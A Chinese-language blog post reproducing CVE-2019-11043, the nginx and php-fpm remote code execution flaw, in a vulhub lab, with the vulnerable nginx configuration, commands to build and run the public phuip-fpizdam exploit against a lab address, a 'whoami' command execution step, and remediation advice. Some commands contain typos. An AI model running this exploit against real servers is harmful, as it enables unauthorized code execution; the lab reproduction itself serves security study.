CVE-2019-11043 php-fpm和nginx RCE漏洞复现

目录

漏洞概述

Nginx 上 fastcgi_split_path_info 在处理带有 %0a 的请求时,会因为遇到换行符 \n 导致 PATH_INFO 为空。而 php-fpm 在处理 PATH_INFO 为空的情况下,存在逻辑缺陷。攻击者通过精心的构造和利用,可以导致远程代码执行。


影响版本

Nginx + php-fpm 的服务器,在使用如下配置的情况下,都可能存在远程代码执行漏洞。
不可以远程代码执行:PHP 7.0/7.1/7.2/7.3

location ~ [^/]\.php(/|$) {
        ···
        fastcgi_split_path_info ^(.+?\.php)(/.*)$;
        fastcgi_param PATH_INFO       $fastcgi_path_info;
        fastcgi_pass   php:9000;
        ...
  }
}

漏洞复现

vulhub 靶机一台:192.168.56.136
kali 攻击机一台:192.168.56.133

环境启动

cd vulhub/php/CVE-2019-11043/
docker-compose up -d

CVE-2019-11043 php-fpm和nginx RCE漏洞复现
Web访问如下:
CVE-2019-11043 php-fpm和nginx RCE漏洞复现


代码执行

1.kali需按照go语言环境,如已安装好 go 语言环境可跳过此步骤。
访问:go语言环境下载
-下载二进制包:go.1.4.linux-amd64.tar.gz

-将下载的二进制包解压至 /usr/local 目录下。

tar -C /usr/loacl -zxf go.1.4.linux-amd64.tar.gz

-将 /usr/local/go/bin 目录添加至PATH环境变量。

export PATH-$PATH:/usr/local/go/bin

2.下载命令执行的POC

git clone https://github.com/neex/phuip-fpizdam  //下载POC
cd /phuip-fpizdam
go build    //go build 进行编译
ls  //出现phuip-fpizdam 可执行文件为编译成功

CVE-2019-11043 php-fpm和nginx RCE漏洞复现
注:如果编译失败,显示timeout,需要挂代理,然后执行以下语言添加关机变量。

export GOPROXY=https://goproxy.io

3.使用phuip-fpizdam发送数据包,同时访问web页面。

./phuip-fpizdam http://192.168.56.136:8080/index.php

访问:http://192.168.56.136:8080/index.php?a=whoami
命令执行成功:
CVE-2019-11043 php-fpm和nginx RCE漏洞复现
注:如果命令没有执行成功,需多访问几次,因为php-fpm会启动多个子进程,以访问到被污染的进程。


漏洞修复

  • 在不影响正常业务的情况下,删除 Nginx 配置文件中的如下配置:
fastcgi_split_path_info ^(.+?\.php)(/.*)$;
fastcgi_param PATH_INFO  $fastcgi_path_info;
  • 漏洞补丁:
https://bugs.php.net/patch-display.php?bug_id=78599&patch=0001-Fix-bug-78599-env_path_info-underflow-can-lead-to-RC.patch&revision=latest

参考文章:
Timeline Sec 微信公众号漏洞复现文章合集

上一篇:Nginx配置优化


下一篇:Ubuntu 安装yii2 advanced版 遇到的坑